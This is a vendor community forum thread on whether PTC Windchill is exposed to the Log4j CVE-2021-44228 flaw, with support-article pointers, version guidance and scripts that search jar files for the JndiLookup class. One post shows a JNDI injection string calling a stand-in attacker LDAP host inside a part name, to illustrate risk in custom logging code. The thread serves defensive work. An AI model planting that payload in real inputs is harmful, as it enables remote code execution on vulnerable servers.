
Log4j vulnerability

ErikZabokrtsky
8-Gravel

Just opening this thread as I haven't seen it anywhere else. Have there been any talks about the log4j exploit and Windchill? We are on Windchill 11 so I would assume we are open to the vulnerability but haven't seen anything mentioning it anywhere on PTC's sites. Just looking to get ahead of this in any way possible.

Figured I would open this thread publicly instead of a support case as it is affecting everyone.


Good timing, I was just searching the PTC support site and could not find anything. We are on WC11.1 and the security team is looking for an immediate action. I am going to submit a high priority case to make sure PTC is aware of the issue.

PTC Technical Support Response:
PTC R&D team and Security Team are actively working on priority for Log4j2 vulnerability CVE-2021-44228 reported.
The log4j version used by Windchill can be detected by referring to the article https://www.ptc.com/en/support/article/CS358667
PTC Security Experts will roll out an official communication soon about this CVE, its impact for customers & the next actions.


rleir
17-Peridot
(To:ScottMorris)

Scott

That article suggests that you look at this article: https://www.ptc.com/en/support/article/CS358789 which has some Immediate actions to take. It makes sense to do the Immediate actions .. immediately! Before thinking about how exactly the attacker will be exploiting Log4J.

Just my two cents. cheers -- Rick

Hi @ErikZabokrtsky .

 

As @ScottMorris responded, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.

 

Please refer to this mini-site in order to get the latest updates on this investigation.

 

In case of any issue or doubt, please contact our Technical Support team.

 

Thank you.

 

--JC


@Jean-Christophe wrote:

Hi @ErikZabokrtsky .

 

As @ScottMorris responded, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.


I hope they are also taking into account custom code like this:

WTPart part;
//part name = "${jndi:ldap://attacker.com/a}"
Logger log = LogR.getLogger(MyCustomClass.class.getName());
log.error("Is this an issue?? part name: " + part.getName());

Thank you for the suggestion, @RandyJones

 

Our security team has been extensively testing, but I will pass over your suggestion.

rhart
14-Alexandrite
(To:ErikZabokrtsky)

Hi @Jean-Christophe ,

Please could you pass on the question whether Office Workers are vulnerable, we found log4j-core-2.11.1.jar in Adobe Experience Manager (provided by PTC as part of Creo View Office Worker Adapters)

We can't find anything regarding the workers on the PTC support website.

Regards

Rob

Jean-Christophe
13-Aquamarine
(To:rhart)

Hi @rhart ,

 

Please be aware that we have created a minisite to act as a more comprehensive hub on this situation

 

I will pass over your question to the security team. In parallel, I encourage that you engage our support team for a closer assistance on your question


@Jean-Christophe wrote:

... In parallel, I encourage that you engage our support team for a closer assistance on your question


"Case Logger": https://www.ptc.com/en/support/case-logger 

rhart
14-Alexandrite
(To:VladimirN)

Case 16180288

Jean-Christophe
13-Aquamarine
(To:rhart)

Thank you for raising this question to our support staff. We will publish the outcome of the investigation around Office Workers in the mini site once it is available.

Following is something one can use to find any jar file that contains the JndiLookup class or any class/path that contains the string JndiLookup. Because it is using "grep -i" this is a case insensitive search. This is what we used to find "affected" jar files in our Solr install. This is sh or bash.

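cd /opt/ptc/Windchill/Solr/SolrServer
# Check each jar's table of contents for JndiLookup (case-insensitive);
# reading paths line by line keeps file names with spaces intact
find . -name '*.jar' -print | while IFS= read -r jar
do
  if jar tvf "$jar" | grep -qi JndiLookup; then
    echo "Issue in $jar"
  fi
done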
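
Added example, not part of the post above or of PTC's guidance: the same case-insensitive JndiLookup search written in Python, extended to descend into archives packed inside other archives (for instance a jar under WEB-INF/lib of a war), which listing only the outer file does not reveal. The archive extensions, the depth limit and the sample files are assumptions constructed for the demonstration.

```python
import io
import tempfile
import zipfile
from pathlib import Path

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def scan_archive(data, label, max_depth=5):
    """Return entry paths naming JndiLookup, descending into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []  # unreadable archive: skip it instead of aborting the scan
    hits = []
    with zf:
        for name in zf.namelist():
            path = f"{label}!/{name}"
            if "jndilookup" in name.lower():  # case-insensitive, like grep -i
                hits.append(path)
            elif name.lower().endswith(ARCHIVE_EXT) and max_depth > 0:
                hits += scan_archive(zf.read(name), path, max_depth - 1)
    return hits


def scan_tree(root):
    """Scan every archive file under root and return the combined hit list."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_EXT:
            hits += scan_archive(p.read_bytes(), p.relative_to(root).as_posix())
    return hits


def make_zip(entries):  # constructed in-memory archive from {entry name: bytes}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()


def demo():
    """Constructed sample: a clean jar and a war with a nested log4j-core jar."""
    inner = make_zip({"org/apache/logging/log4j/core/lookup/JndiLookup.class": b""})
    with tempfile.TemporaryDirectory() as root:
        Path(root, "clean.jar").write_bytes(make_zip({"com/example/App.class": b""}))
        Path(root, "app.war").write_bytes(make_zip({"WEB-INF/lib/log4j-core.jar": inner}))
        return scan_tree(root)
```

Calling scan_tree on an install directory returns one path per match, with "!/" separating each level of nesting.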

 

Dear all, 

Do you know if there is an impact on Windchill 11.0 M30 and older versions?

The PTC article CS358789 seems to only cover 11.1 to 12.x.

According to CS358667 it seems that these files are used there?

Regards,

Haithem 

Hello @HaithemBouajila 

 

As stated in CS358789, Windchill 11.1 M020 and earlier (including 11.0 M030 and older versions) are using log4j 1.x, so it should not be vulnerable.
* PTC security teams continuously monitor and analyze supported Windchill releases for any reported critical or high CVE.
Please always check the latest CS358789 for updates.

 

3rd party bundled components may still be vulnerable, please:
Solr: Refer to CS359011, Solr of old Windchill releases (10.1, 10.2, 11.0) is not impacted by CVE-2021-44228.
Cognos: Refer to CS359007 and IBM update page An update on the Apache Log4j CVE-2021-44228 vulnerability.
Tibco: Refer to CS359008 and TIBCO published article: TIBCO Log4j Vulnerability Daily Update.

 

Thanks,

Susan

 
